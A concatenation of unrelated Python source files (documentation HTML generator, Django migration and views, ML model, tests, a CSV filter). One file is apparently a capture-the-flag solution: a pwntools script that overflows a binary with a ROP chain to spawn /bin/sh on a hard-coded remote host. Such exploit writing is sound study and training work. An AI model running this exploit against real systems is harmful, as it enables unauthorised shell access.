for column in range(3):
progs = (programs1, programs2, programs3)[column]
text = ''
for program in progs:
id = 'ppci-program-{}'.format(program.language)
link = '#{}'.format(program.__name__)
t = "<a id='{}' href='{}' onmouseover='ppci_show_targets(\"{}\");'"
t += " onmouseout='ppci_hide_targets();'>{}</a>"
text += t.format(id, link, program.language, program.language)
text += '\n'
columns.append('<td>{}</td>'.format(text))
table_html = (
"<table class='ppci-programs'>\n" +
"<tr><th><a href='#SourceCodeProgram'>Source code</a></th>" +
"<th><a href='#IntermediateProgram'>Intermediate</a></th>" +
"<th><a href='#MachineProgram'>Machine code</a></th></tr>\n" +
"<tr>{}</tr></tr>\n".format(''.join(columns)) +
"</table>")
# Generate "graph"
# - the references are sorted by group so that arrows dont cross
graphdict = {}
for source_program in programs1 + programs2 + programs3:
targets = get_targets(source_program)
graphdict[source_program.language] = sorted_targets = []
for target_program in programs1 + programs2 + programs3:
if target_program.language in targets:
sorted_targets.append(target_program.language)
html = HTML.replace('TABLE', table_html).replace('STYLE', STYLE)
html = html.replace('JS', JS).replace('GRAPHDICT', json.dumps(graphdict))
return html
# Below is some html/css/js that is included in the rst
HTML = """
<script>
var ppci_graphdict = GRAPHDICT;
JS
</script>
<style>
STYLE
</style>
TABLE
"""
STYLE = """
table.ppci-programs {
width: 100%;
max-width: 50em;
}
table.ppci-programs th{
text-align: center;
font-weight: bold;
text-decoration: none;
}
table.ppci-programs th > a {
text-decoration: none;
}
table.ppci-programs td > a {
display: block;
border: 1px solid rgba(0, 0, 0, 0.5);
background: #fff;
border-radius: 0.2em;
padding: 0.1em 0.5em;
margin: 0.5em 1em;
font-size: 120%;
text-align: center;
text-decoration: none;
color: #004;
}
table.ppci-programs td > a:hover {
border: 1px solid rgba(0, 0, 255, 0.5);
}
table.ppci-programs td > a > div.ppci-arrow {
position: absolute;
z-index: 20;
border: 1.5px solid rgba(0, 0, 255, 0.4);
margin: 0;
padding: 0;
text-align: right;
vertical-align: center;
height: 0;
font-size: 10px; /* get consistent arrow heads */
transform-origin: top left;
}
table.ppci-programs td > a > div.ppci-arrow > i {
border: 1.5px solid rgba(0, 0, 255, 0.4);
border-width: 0 3px 3px 0;
display: inline-block;
margin: 0;
padding: 4px;
transform: translate(1px, -5.5px) rotate(-45deg);
}
"""
JS = """
function ppci_hide_targets() {
for (var i=0; i<ppci_arrows.length; i++) {ppci_arrows[i].remove(); }
ppci_arrows = [];
}
function ppci_show_targets(name) {
var p1, p2, d1, d2, r1, r2, dist;
d1 = document.getElementById('ppci-program-' + name);
r1 = d1.getBoundingClientRect();
var targets = ppci_graphdict[name];
for (var i=0; i<targets.length; i++) {
d2 = document.getElementById('ppci-program-' + targets[i]);
r2 = d2.getBoundingClientRect();
var xx = get_rect_edge_positions(r1, r2);
p1 = xx[0]; p2 = xx[1]; dist = xx[2];
p1 = [p1[0] + window.scrollX, p1[1] + window.scrollY];
p2 = [p2[0] + window.scrollX, p2[1] + window.scrollY];
var angle = Math.atan2(p2[1] - p1[1], p2[0] - p1[0]);
var arrow = document.createElement('div');
arrow.className = 'ppci-arrow';
arrow.appendChild(document.createElement('i'));
d1.appendChild(arrow);
ppci_arrows.push(arrow);
arrow.style.left = p1[0] + 'px';
arrow.style.top = p1[1] + 'px';
arrow.style.width = dist + 'px';
arrow.style.transform = 'rotate(' + angle + 'rad)';
}
}
function get_rect_edge_positions(r1, r2) {
var i, p1, p2, dist, p, d;
p1 = c1 = [0.5 * (r1.left + r1.right), 0.5 * (r1.top + r1.bottom)];
p2 = c2 = [0.5 * (r2.left + r2.right), 0.5 * (r2.top + r2.bottom)];
dist = Math.pow(p1[0] - p2[0], 2) + Math.pow(p1[1] - p2[1], 2);
// first select closest point on rect 1
var positions1 = [
[c1[0], r1.top], [c1[0], r1.bottom],
[r1.left, c1[1]], [r1.right, c1[1]]];
for (var i=0; i<4; i++) {
p = positions1[i];
d = Math.pow(p[0] - p2[0], 2) + Math.pow(p[1] - p2[1], 2);
if (d < dist) { p1 = p; dist = d; }
}
// then select closest point on rect 2
var positions2 = [
[c2[0], r2.top], [c2[0], r2.bottom],
[r2.left, c2[1]], [r2.right, c2[1]]];
for (var i=0; i<4; i++) {
p = positions2[i];
d = Math.pow(p1[0] - p[0], 2) + Math.pow(p1[1] - p[1], 2);
if (d < dist) { p2 = p; dist = d; }
}
return [p1, p2, Math.sqrt(dist)];
}
var ppci_arrows = [];
"""
|
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./lsass')
if args.REMOTE:
p = remote('35.238.225.156', 1004)
else:
p = process(binary.path)
# ropper --file lsass --chain "execve cmd=/bin/sh" --badbytes 0a
IMAGE_BASE_0 = 0x08048000 # da2732480d49a078e666802ee2edcd948700eacaaa48129430ea1ff6d5e8e5c6
rebase_0 = lambda x : p32(x + IMAGE_BASE_0)
rop = b''
rop += rebase_0(0x0000319b) # 0x0804b19b: pop edi; ret;
rop += b'//bi'
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x0009a060)
rop += rebase_0(0x0004627d) # 0x0808e27d: mov dword ptr [ebx], edi; pop ebx; pop esi; pop edi; ret;
rop += p32(0xdeadbeef)
rop += p32(0xdeadbeef)
rop += p32(0xdeadbeef)
rop += rebase_0(0x0000319b) # 0x0804b19b: pop edi; ret;
rop += b'n/sh'
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x0009a064)
rop += rebase_0(0x0004627d) # 0x0808e27d: mov dword ptr [ebx], edi; pop ebx; pop esi; pop edi; ret;
rop += p32(0xdeadbeef)
rop += p32(0xdeadbeef)
rop += p32(0xdeadbeef)
rop += rebase_0(0x0000319b) # 0x0804b19b: pop edi; ret;
rop += p32(0x00000000)
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x0009a068)
rop += rebase_0(0x0004627d) # 0x0808e27d: mov dword ptr [ebx], edi; pop ebx; pop esi; pop edi; ret;
rop += p32(0xdeadbeef)
rop += p32(0xdeadbeef)
rop += p32(0xdeadbeef)
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x0009a060)
rop += rebase_0(0x0001c081) # 0x08064081: pop ecx; add al, 0xf6; ret;
rop += rebase_0(0x0009a068)
rop += rebase_0(0x0004fa95) # 0x08097a95: pop edx; xor eax, eax; pop edi; ret;
rop += rebase_0(0x0009a068)
rop += p32(0xdeadbeef)
rop += rebase_0(0x00001825) # 0x08049825: pop ebp; ret;
rop += p32(0x0000000b)
rop += rebase_0(0x0001aa7e) # 0x08062a7e: xchg eax, ebp; ret;
rop += rebase_0(0x000319a0) # 0x080799a0: int 0x80; ret;
payload = 0x11 * b'A'
payload += rop
p.sendlineafter('arguments:\n',payload)
p.interactive()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-05-23 17:22
from __future__ import unicode_literals
import django.contrib.postgres.fields
import django.contrib.postgres.search
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('references', '0016_create_gtas_total_obligation_table'),
('awards', '0030_merge_20180517_1646'),
]
operations = [
migrations.CreateModel(
name='SubawardView',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('keyword_ts_vector', django.contrib.postgres.search.SearchVectorField()),
('award_ts_vector', django.contrib.postgres.search.SearchVectorField()),
('recipient_name_ts_vector', django.contrib.postgres.search.SearchVectorField()),
('latest_transaction_id', models.IntegerField()),
('last_modified_date', models.DateField()),
('subaward_number', models.TextField()),
('amount', models.DecimalField(decimal_places=2, max_digits=20)),
('total_obl_bin', models.TextField()),
('description', models.TextField(blank=True, null=True)),
('fiscal_year', models.IntegerField()),
('action_date', models.DateField()),
('award_report_fy_month', models.IntegerField()),
('award_report_fy_year', models.IntegerField()),
('award', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, to='awards.Award')),
('generated_unique_award_id', models.TextField()),
('awarding_agency_id', models.IntegerField()),
('funding_agency_id', models.IntegerField()),
('awarding_toptier_agency_name', models.TextField()),
('awarding_subtier_agency_name', models.TextField()),
('funding_toptier_agency_name', models.TextField()),
('funding_subtier_agency_name', models.TextField()),
('place_of_performance', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, to='references.Location')),
('recipient', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, to='references.LegalEntity')),
('award_type', models.TextField()),
('prime_award_type', models.TextField()),
('cfda_id', models.IntegerField()),
('piid', models.TextField()),
('fain', models.TextField()),
('business_categories', django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), default=list, size=None)),
('recipient_name', models.TextField()),
('prime_recipient_name', models.TextField()),
('recipient_unique_id', models.TextField()),
('parent_recipient_unique_id', models.TextField()),
('pulled_from', models.TextField()),
('type_of_contract_pricing', models.TextField()),
('type_set_aside', models.TextField()),
('extent_competed', models.TextField()),
('product_or_service_code', models.TextField()),
('product_or_service_description', models.TextField()),
('cfda_number', models.TextField()),
('recipient_location_country_code', models.TextField()),
('recipient_location_country_name', models.TextField()),
('recipient_location_state_code', models.TextField()),
('recipient_location_county_code', models.TextField()),
('recipient_location_county_name', models.TextField()),
('recipient_location_zip5', models.TextField()),
('recipient_location_congressional_code', models.TextField()),
('pop_country_code', models.TextField()),
('pop_country_name', models.TextField()),
('pop_state_code', models.TextField()),
('pop_county_code', models.TextField()),
('pop_county_name', models.TextField()),
('pop_city_code', models.TextField()),
('pop_zip5', models.TextField()),
('pop_congressional_code', models.TextField()),
],
options={
'db_table': 'subaward_view',
'managed': False,
},
),
migrations.CreateModel(
name='SummaryStateView',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('action_date', models.DateField()),
('fiscal_year', models.IntegerField()),
('type', models.TextField()),
('pulled_from', models.TextField()),
('distinct_awards', django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), default=list, size=None)),
('pop_country_code', models.TextField()),
('pop_state_code', models.TextField()),
('generated_pragmatic_obligation', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('federal_action_obligation', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('original_loan_subsidy_cost', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('face_value_loan_guarantee', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('counts', models.IntegerField()),
],
options={
'db_table': 'summary_state_view',
'managed': False,
},
),
]
|
"""User model"""
# local import
from .db_config import db
from api.models.Base.Base_model import BaseModel
class User(BaseModel):
"""User model"""
# table name
__tablename__ = 'users'
verified = db.Column(db.Boolean, default=False)
first_name = db.Column(db.String(80), nullable=False)
last_name = db.Column(db.String(80), nullable=False)
token = db.Column(db.String, nullable=True)
username = db.Column(db.String(80), unique=True, nullable=False)
email = db.Column(db.String(120), unique=True, nullable=False)
password = db.Column(db.String, nullable=True)
password_reset = db.Column(db.String, nullable=True)
def __repr__(self):
return '<User {}>'.format(self.email)
|
from .utils import assert_raises
from render_liquid import LiquidRenderer, JobError
def test_renderer():
render = LiquidRenderer().render
template = r"""{{greeting | capitalize}}, {{name | append:'!'}}"""
# Does it work?
result = render(template, {'greeting': 'hello', 'name': 'world'})
assert result == 'Hello, world!', result
# Try to break it
assert_raises(JobError, render, 1, 2)
assert_raises(JobError, render, 3, 4)
# Does it still work?
result = render(template, {'greeting': 'ayy', 'name': 'lmao'})
assert result == 'Ayy, lmao!', result
|
# Google Play Store Data Filter
# Authored by Matthew Steuerer, Nikhil Sankepalli, and Seth Curry
# October 7th, 2020
# Demonstrates the use of Lists is Python with 2018 Google Play Store Data
# Data Source URL: https://www.kaggle.com/lava18/google-play-store-apps
# Initial Ideas: create a list of objects where each entry in the list is an app object
# Each app will have attributes that correspond to column titles
# The user needs to be able to filter on up to three of these attributes
# User inputs their criteria and the program needs to find and count all records that match
import csv
# Class to represent an app object and all its properties (columns) from the data source
# Class approach was abandoned, it complicated processing unnecessarily but is good object review in python
class GoogleApp:
def __init__(self, app, category, rating, reviews, size, installs, type, price, contentRating, genres, lastUpdated,
currentVer, androidVer):
self.app = app
self.category = category
self.rating = rating
self.reviews = reviews
self.size = size
self.installs = installs
self.type = type
self.price = price
self.contentRating = contentRating
self.genres = genres
self.lastUpdated = lastUpdated
self.currentVer = currentVer
self.androidVer = androidVer
# String Representation of Google App Object (How its displayed once its printed)
def __str__(self):
appString = self.app + " " + self.category + " " + self.rating + " " + self.reviews + " "
appString = appString + " " + self.size + " " + self.installs + " " + self.type + " "
appString = appString + " " + self.price + " " + self.contentRating + " " + self.genres + " "
appString = appString + " " + self.lastUpdated + " " + self.currentVer + " " + self.androidVer
return appString
# Our list object which will hold the entire data source for processing
appList = [] # this was abandoned, but it was cool to make an entire list of objects
appList2 = []
# Use a reader object to read from csv file data source
with open('googleplaystore.csv') as csvFile:
readCSV = csv.reader(csvFile, delimiter=',')
i = 0
for row in readCSV:
# Note: needed to edit data source as one row had two columns that were null and reader object threw errors
# For each row in the file, make an object and append it to the list of items
appList.append(
GoogleApp(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9], row[10], row[11],
row[12]))
listFormOfApp = [row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9], row[10],
row[11], row[12]]
appList2.append(listFormOfApp)
# Display function that only serves to format menu selection
def displayColumns():
print("1. App Name \t 2. Category (All Caps) \t 3. Rating (1-5) \t 4. # of Reviews \t 5. Size (in MB) 6. # of "
"Installs \n")
print("7. Type (Paid or Free) \t 8. Price (don't enter $ sign) \t 9. Content Rating \t 10. Genres \t 11. Last "
"Updated Date \n")
print("12. Current Version (must be exact version #) \t 13. Android Version (minimum Android OS "
"required (also must be exact version #) \n")
# Function definition that searches for just one term in one column
def searchOneTerm(columnInput1, searchList, searchedTerm1): # the input1 here is the column to search
length = len(searchList) # total list length
rowIndex = 0 # start at the beginning of the list
totalMatchingRows = 0 # count variable for matching rows to return to the user
while rowIndex < length: # go through the entire list; remember that users input will be 1 higher
checkApp = appList2[rowIndex]
if searchedTerm1 in checkApp[columnInput1 - 1]: # remember to account for lists starting at index 0
print(checkApp) # string representation of the app
totalMatchingRows = totalMatchingRows + 1
rowIndex = rowIndex + 1 # check the next row for matches
print("Total apps matching your search: " + str(totalMatchingRows)) # return total to console
# Search for two term conditions to be true
def searchTwoTerms(columnInput1, columnInput2, searchList, searchedTerm1, searchedTerm2):
length = len(searchList)
rowIndex = 0
totalMatchingRows = 0
while rowIndex < length:
checkApp = appList2[rowIndex]
if searchedTerm1 in checkApp[columnInput1 - 1] and searchedTerm2 in checkApp[columnInput2 - 1]:
print(checkApp)
totalMatchingRows = totalMatchingRows + 1
rowIndex = rowIndex + 1
print("Total apps matching your search: " + str(totalMatchingRows))
# Search for three conditions to be true
def searchThreeTerms(columnInput1, columnInput2, columnInput3, searchList, searchedTerm1, searchedTerm2, searchedTerm3):
length = len(searchList)
rowIndex = 0
totalMatchingRows = 0
while rowIndex < length:
checkApp = appList2[rowIndex]
if searchedTerm1 in checkApp[columnInput1 - 1] and searchedTerm2 in checkApp[columnInput2 - 1] and searchedTerm3 in checkApp[columnInput3 - 1]:
print(checkApp)
totalMatchingRows = totalMatchingRows + 1
rowIndex = rowIndex + 1
print("Total apps matching your search: " + str(totalMatchingRows))
# Requirements state user must be able to search by up to three values (Need to check up to 3 columns)
# Ask user how many search values they will enter (up to three allowed)
# First, prompt and ask user how many key values they will search for
print("Welcome to the Google Play Store Filter!")
print("This program allows you to select up to three search terms to find matching Google Apps")
print("Note: You will be prompted to select how many fields you'd like to search by first.")
print("Then, you will be prompted for your search term. Enter the term, followed by enter with no unnecessary spaces.")
print("Consult the User Guide Included with this application to learn how to effectively search.")
exitCondition = False # exit condition to terminate menu loop
while not exitCondition:
numberOfSearchTerms = int(input("Would you like to use 1, 2, or 3 search terms? Please type the number and press "
"enter. Enter 4 to exit the program. \n"))
if numberOfSearchTerms == 1:
# offer all columns and let user pick one to search on
# then search the entire list at that columns index and return all that match
displayColumns()
input1 = int(input("Which column above would you like to search on? \n"))
searchTerm1 = input("What term do you wish to search for? \n")
searchOneTerm(input1, appList2, searchTerm1)
elif numberOfSearchTerms == 2:
displayColumns()
input1 = int(input("Select the first column you would like to search on: \n"))
input2 = int(input("Select the second column you would like to search on: \n"))
searchTerm1 = input("What is the first term you wish to search for? \n")
searchTerm2 = input("What is the second term you wish to search for? \n")
searchTwoTerms(input1, input2, appList2, searchTerm1, searchTerm2)
elif numberOfSearchTerms == 3:
displayColumns()
input1 = int(input("Select the first column you would like to search on: \n"))
input2 = int(input("Select the second column you would like to search on: \n"))
input3 = int(input("Select the third column you would like to search on: \n"))
searchTerm1 = input("What is the first term you wish to search for? \n")
searchTerm2 = input("What is the second term you wish to search for? \n")
searchTerm3 = input("What is the third term you wish to search for? \n")
searchThreeTerms(input1, input2, input3, appList2, searchTerm1, searchTerm2, searchTerm3)
elif numberOfSearchTerms == 4:
exitCondition = True
|
from __future__ import annotations
from VersionControlProvider.Issue import Issue
from VersionControlProvider.IssueState import IssueState
class IssueDefault(Issue):
def get_ref(self) -> str:
if self.number is None:
raise ValueError('Issue should have a number')
return '{prefix!s}{number!s}'.format(prefix=self.PREFIX, number=self.number)
def __dict__(self):
issue: dict = {
'title': self.title
}
if self.body is not None:
issue['body'] = self.body
if self.milestone is not None:
issue['milestone'] = self.milestone
if self.url is not None:
issue['url'] = self.url
if self.state is not None:
issue['state'] = self.state.value
if len(self.labels):
issue['labels'] = self.labels
if len(self.assignees):
issue['assignees'] = self.assignees
return issue
|
from apps.email import send_mail
from django.contrib.auth.decorators import login_required
from django.shortcuts import render,redirect
from django.contrib.auth.models import User
from django.contrib import messages
from django.db.models import Count
from django.urls import reverse
from django.views.decorators.csrf import csrf_exempt
from django.core.cache import cache
from .models import Bug_report
from .forms import BugReportForm
@csrf_exempt
def home(request):
"""Landing Page"""
if request.user.is_authenticated:
return redirect(reverse('homepage'))
if request.method=='POST': # celery email
name = request.POST.get('name')
email = request.POST.get('email')
message =f"{name} \n {email} \n {request.POST.get('message')} "
mail_subject = 'Contact us : Sent by ' + name
if(send_mail(mail_subject,message,'guru.online.classroom.portal@gmail.com',['guru.online.classroom.portal@gmail.com'])):
messages.add_message(request,messages.SUCCESS,'Your message sent successfully.')
else:
messages.add_message(request,messages.ERROR,"An Error while sending your message.\
Please try again or contact using given contact details.")
return render(request,'intro.html')
def features(request):
return render(request, 'features.html')
def privacy(request):
return render(request, 'privacy.html')
@login_required
def bug_report(request):
reporters = cache.get('reporters')
if not reporters:
reporters = (User.objects.filter(
id__in=Bug_report.objects.values_list('user__id',flat=True)
)
.annotate(itemcount=Count('bug_report')).order_by('-itemcount')[:20]
)
cache.set('reporters', reporters, 15*60)
if request.method=="POST":
form = BugReportForm(request.POST, request.FILES)
if form.is_valid():
form = form.save(commit=False)
form.user = request.user
form.save()
return redirect(request.META['HTTP_REFERER'])
else:
form = BugReportForm()
params={
'form':form,
'reporters':reporters
}
return render(request,'bug_report.html',params) |
import numpy as np
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras.layers import Input, BatchNormalization, Conv3D, Dense, Flatten, Reshape, Conv3DTranspose
from tensorflow.keras.models import Model
input_shape = (1, 32, 32, 32)
z_dim = 128
def get_model():
enc_in = Input(shape = input_shape)
enc_idx = Input(shape = (1,), dtype = 'int32')
enc_conv1 = BatchNormalization()(
Conv3D(
filters = 32,
kernel_size = (4, 4, 4),
strides = (2, 2, 2),
padding = 'same',
activation = 'relu',
data_format = 'channels_first')(enc_in))
enc_conv2 = BatchNormalization()(
Conv3D(
filters = 16,
kernel_size = (4, 4, 4),
strides = (2, 2, 2),
padding = 'same',
activation = 'relu',
data_format = 'channels_first')(enc_conv1))
enc_conv3 = BatchNormalization()(
Conv3D(
filters = 8,
kernel_size = (4, 4, 4),
strides = (2, 2, 2),
padding = 'same',
activation = 'relu',
data_format = 'channels_first')(enc_conv2))
z = Dense(
units = z_dim,
activation = 'relu')(Flatten()(enc_conv3))
encoder = Model(enc_in, z)
dec_in = Input(shape = (z_dim, ))
dec_fc1 = Dense(
units = 512,
activation = 'relu')(dec_in)
dec_unflatten = Reshape(
target_shape = (8, 4, 4, 4))(dec_fc1)
dec_conv1 = BatchNormalization()(
Conv3DTranspose(
filters = 16,
kernel_size = (4, 4, 4),
strides = (2, 2, 2),
padding = 'same',
activation = 'relu',
data_format = 'channels_first')(dec_unflatten))
dec_conv2 = BatchNormalization()(
Conv3DTranspose(
filters = 32,
kernel_size = (4, 4, 4),
strides = (2, 2, 2),
padding = 'same',
activation = 'relu',
data_format = 'channels_first')(dec_conv1))
dec_conv3 = Conv3DTranspose(
filters = 1,
kernel_size = (4, 4, 4),
strides = (2, 2, 2),
padding = 'same',
activation = 'sigmoid',
data_format = 'channels_first')(dec_conv2)
decoder = Model(dec_in, dec_conv3)
dec_conv3 = decoder(encoder(enc_in))
gae = Model([enc_in, enc_idx], dec_conv3)
return {'inputs': enc_in,
'indices': enc_idx,
'outputs': dec_conv3,
'z': z,
'encoder': encoder,
'decoder': decoder,
'gae': gae}
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class DataSource(object):
'''
Defines an abstraction for all DataSources.
DataSources must have two public methods, get and Refresh. A DataSource is
initialized with a ServerInstance and a Request (defined in servlet.py).
Anything in the ServerInstance can be used by the DataSource. Request is None
when DataSources are created for Refresh.
DataSources are used to provide templates with access to data. DataSources may
not access other DataSources and any logic or data that is useful to other
DataSources must be moved to a different class.
'''
def __init__(self, server_instance, request):
pass
def GetRefreshPaths(self):
'''Returns a list of paths to query
(relative to _refresh/<data_source_name>/) with the task queue in order
to refresh this DataSource's data set. Any paths listed here will be
routed to the DataSource Refresh method in a taskqueue task request.
'''
return ['']
def Refresh(self, path=None):
'''Handles _refresh requests to this DataSource. Should return a Future
indicating the success or failure of the refresh.'''
raise NotImplementedError(self.__class__)
def get(self, key):
'''Returns a dictionary or list that can be consumed by a template. Called
on an offline file system and can only access files in the cache.
'''
raise NotImplementedError(self.__class__)
|
import math
import numpy as np
import pytest
from scipy.spatial import ConvexHull
from adaptive.learner.base_learner import uses_nth_neighbors
from adaptive.learner.learnerND import LearnerND, curvature_loss_function
def ring_of_fire(xy):
a = 0.2
d = 0.7
x, y = xy
return x + math.exp(-((x ** 2 + y ** 2 - d ** 2) ** 2) / a ** 4)
def test_learnerND_inits_loss_depends_on_neighbors_correctly():
learner = LearnerND(ring_of_fire, bounds=[(-1, 1), (-1, 1)])
assert learner.nth_neighbors == 0
def test_learnerND_curvature_inits_loss_depends_on_neighbors_correctly():
loss = curvature_loss_function()
assert loss.nth_neighbors == 1
learner = LearnerND(ring_of_fire, bounds=[(-1, 1), (-1, 1)], loss_per_simplex=loss)
assert learner.nth_neighbors == 1
def test_learnerND_accepts_ConvexHull_as_input():
triangle = ConvexHull([(0, 1), (2, 0), (0, 0)])
learner = LearnerND(ring_of_fire, bounds=triangle)
assert learner.nth_neighbors == 0
assert np.allclose(learner._bbox, [(0, 2), (0, 1)])
def test_learnerND_raises_if_too_many_neigbors():
@uses_nth_neighbors(2)
def loss(*args):
return 0
assert loss.nth_neighbors == 2
with pytest.raises(NotImplementedError):
LearnerND(ring_of_fire, bounds=[(-1, 1), (-1, 1)], loss_per_simplex=loss)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.